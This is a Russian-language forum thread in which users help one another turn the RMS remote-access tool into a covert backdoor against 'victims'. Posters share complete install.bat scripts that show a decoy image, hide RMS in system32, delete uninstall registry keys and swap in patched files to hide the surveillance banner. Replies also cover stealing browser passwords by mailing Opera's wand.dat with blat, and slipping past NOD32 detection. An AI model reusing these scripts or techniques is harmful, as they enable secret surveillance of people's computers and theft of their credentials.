RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. vlader
    vlader Guest
    sc config имя службы displayname= "Отображаемое название"

    Добавлено через 2 часа 40 минут
    Значит дело в самом архиве. Немного измените его и всё должно стать хорошо.
     
    Последнее редактирование модератором: 10 ноя 2011
    10 ноя 2011
  2. zaratrem
    zaratrem Новичок
    Симпатии:
    0
    Что ты имеешь в виду под изменением архива, уровень сжатия, название, HEX?
     
    10 ноя 2011
  3. damirtm58n
    damirtm58n Новичок
    Симпатии:
    0
    Антивирус нод 32 определил как вирус, Программу например Free Keylogger как отредактировать для скрытия иконки в трее?
     
    10 ноя 2011
  4. vlader
    vlader Guest
    Содержимое. Немного измените файлы install.bat и stop.js
     
    10 ноя 2011
  5. Nulik
    Nulik Новичок
    Симпатии:
    1
    И куда эту строчку вставлять, чтобы жертва видела картинку, пока устанавливается файл? И будет ли это все работать, если одновременно с этим переименовать exe в scr?
     
    11 ноя 2011
  6. damirtm58n
    damirtm58n Новичок
    Симпатии:
    0
    В начало батника
     
    11 ноя 2011
  7. Nulik
    Nulik Новичок
    Симпатии:
    1
    То есть в setup.exe должно присутствовать изображение и батник будет выглядеть вот так?
    PHP:
    @echo off

    copy 
    /y img1.jpg %SYSTEMROOT%\img1.jpg

    start 
    %SYSTEMROOT%\img1.jpg

    mkdir 
    %systemroot%\system32\sysfiles

    copy 
    /y "RMS.exe" "%SystemRoot%\system32\sysfiles\RMS.exe"

    attrib +s +h +r "%SystemRoot%/system32/sysfiles/RMS.exe"


    cd %SystemRoot%\system32\sysfiles
    start RMS
    .exe

    exit
    Вот еще наверно не по теме вопрос - Как скрыто установить любую прогу на комп жертвы, уже имея доступ к ней?

    Может я и нуб, но очень прошу ответить )
     
    Последнее редактирование: 12 ноя 2011
    12 ноя 2011
  8. damirtm58n
    damirtm58n Новичок
    Симпатии:
    0
    Да, верно по поводу батника, а скрыто ставить прогу можно используя проги UNATTENDED (тихая установка), можно и самому создать такие проги
     
    12 ноя 2011
  9. Nulik
    Nulik Новичок
    Симпатии:
    1
    Кстати, убрать баннер не получилось по ссылке в 95-м посте, жертва спалила и фак выставила мне ) огромное спасибо за советы!
     
    12 ноя 2011
  10. Nulik
    Nulik Новичок
    Симпатии:
    1
    И последнее - как через командную строку получить пароли от браузеров?
     
    12 ноя 2011
    1 человеку нравится это.
  11. damirtm58n
    damirtm58n Новичок
    Симпатии:
    0
    Есть множество вариантов, например start /wait mpr.exe /export
     
    12 ноя 2011
  12. vlader
    vlader Guest
    Нужно в цикле for искать с ключом /R искать в %appdata% файл с паролями от конкретного браузера, например wand.dat и копировать или посылать по почте с помощью blat (это,если ты не знаешь, где пароли), а вообще
    Код:
    blat ... -attach %appdata%\Opera\Opera\wand.dat
    На самом деле лучше так не делать, а собирать скрытую сборку MPR, как и сказал damirtm58n. Вот, можешь посмотреть.
     
    12 ноя 2011
  13. Nulik
    Nulik Новичок
    Симпатии:
    1
    Огромное спасибо! Насчет патча на баннер видеонаблюдения поправка - он работает, но только обязательно перезапустить перед просмотром вебки машину или сервер. Если делать без перезапуска - баннер остается. Ну так, на случай всякий, может эта инфа будет полезной... Благодарю!
     
    12 ноя 2011
  14. radikkk
    radikkk Новичок
    Симпатии:
    0
    Вот пропатченные файлы для 3 беты с руборды, сам проверял, баннер не вылазит, пробуйте.
    http://rghost.ru/29674871
     
    12 ноя 2011
  15. Nulik
    Nulik Новичок
    Симпатии:
    1
    А как удалить сервер из списка установленных программ? Если заранее не вписал эту команду?
     
    13 ноя 2011
  16. крах
    крах Новичок
    Симпатии:
    14
    3 бета ?на оф сайте только 5.1
     
    13 ноя 2011
  17. badpit007
    badpit007 Новичок
    Симпатии:
    0
    Собрал, пробовал ставить жертве, но ее nod32 нашел вирус. Отключил нод32, установил, приконнектился, все норм, но после включения антивируса обратно он при подключении к жертве он сразу палит контору и удаляет процесс.
    Что может помочь в данной ситуации ?
     
    13 ноя 2011
  18. sawyer1992
    sawyer1992 Новичок
    Симпатии:
    6
    Если имеешь доступ к компу, добавь в исключения твой файл, другого варианта не вижу
     
    13 ноя 2011
  19. xsanekk
    xsanekk Новичок
    Симпатии:
    0
    Привет всем! Спасибо всем за советы на этом форуме они мне очень помогли!

    В сетуп добавил:
    2 патченых файлика для 3-й беты (брал отсюда http://rghost.ru/29674871)
    инсталл.бат поправил (ниже весь код)
    картинку (взял картинку любую img1.jpg)

    вот как у меня выглядит install.bat:
    set @x=0 /*
    echo off
    copy /y img1.jpg %SYSTEMROOT%\img1.jpg
    start %SYSTEMROOT%\img1.jpg
    mkdir %systemroot%\system32\sysfiles
    copy "RMS.exe" "%SystemRoot%\system32\sysfiles\RMS.exe" /y
    attrib +s +h +r "%SystemRoot%/system32/sysfiles/RMS.exe"
    cd %SystemRoot%\system32\sysfiles
    start RMS.exe
    cscript //nologo /e:jscript "%~f0" 30000
    reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{11A90858-40BB-4858-A2DA-CA6495B5E907}" /f
    reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\85809A11BB0485842AADAC46595B9E70\InstallProperties" /f
    reg delete "HKCR\Installer\Products\85809A11BB0485842AADAC46595B9E70" /f
    net stop rmanservice
    copy "rfusclient.exe" "%ProgramFiles(x86)%\Remote Manipulator System - Server\" /y
    copy "rutserv.exe" "%ProgramFiles(x86)%\Remote Manipulator System - Server\" /y
    copy "rfusclient.exe" "%ProgramFiles%\Remote Manipulator System - Server\" /y
    copy "rutserv.exe" "%ProgramFiles%\Remote Manipulator System - Server\" /y
    net start rmanservice
    attrib +S +H +r "C:\Program Files\Remote Manipulator System - Server"
    attrib +S +H +r "C:\Program Files (x86)\Remote Manipulator System - Server"
    goto:eof */ if(isFinite(WScript.Arguments(0))) WScript.Sleep(WScript.Arguments(0))
    exit

    Поясняю:
    1. Сначала копируется картинка и вылетает на экран
    2. Потом копируется RMS и запускается в тихом режиме (созданный Вами согласно инструкции)
    3. Делает паузу на 30 секунд что бы до установился рмс
    4. Удаляет Из установка удаление программ
    5. Скрывает в программ филес папку сервера
    6. Останавливает сервер, заменяет патченые файлики и запускает сервер
    Все)))

    В батнике учтено что система может быть и 32 и 64 разрядной.

    И еще одно, у меня в stop.js был прописан запуск install.cmd я изменил на бат так что внимательней)))
     
    Последнее редактирование: 13 ноя 2011
    13 ноя 2011
  20. damirtm58n
    damirtm58n Новичок
    Симпатии:
    0
    А что за команда

    Добавлено через 2 минуты
    И эта команда для чего?
     
    Последнее редактирование: 13 ноя 2011
    13 ноя 2011
Статус темы:
Закрыта.
Загрузка...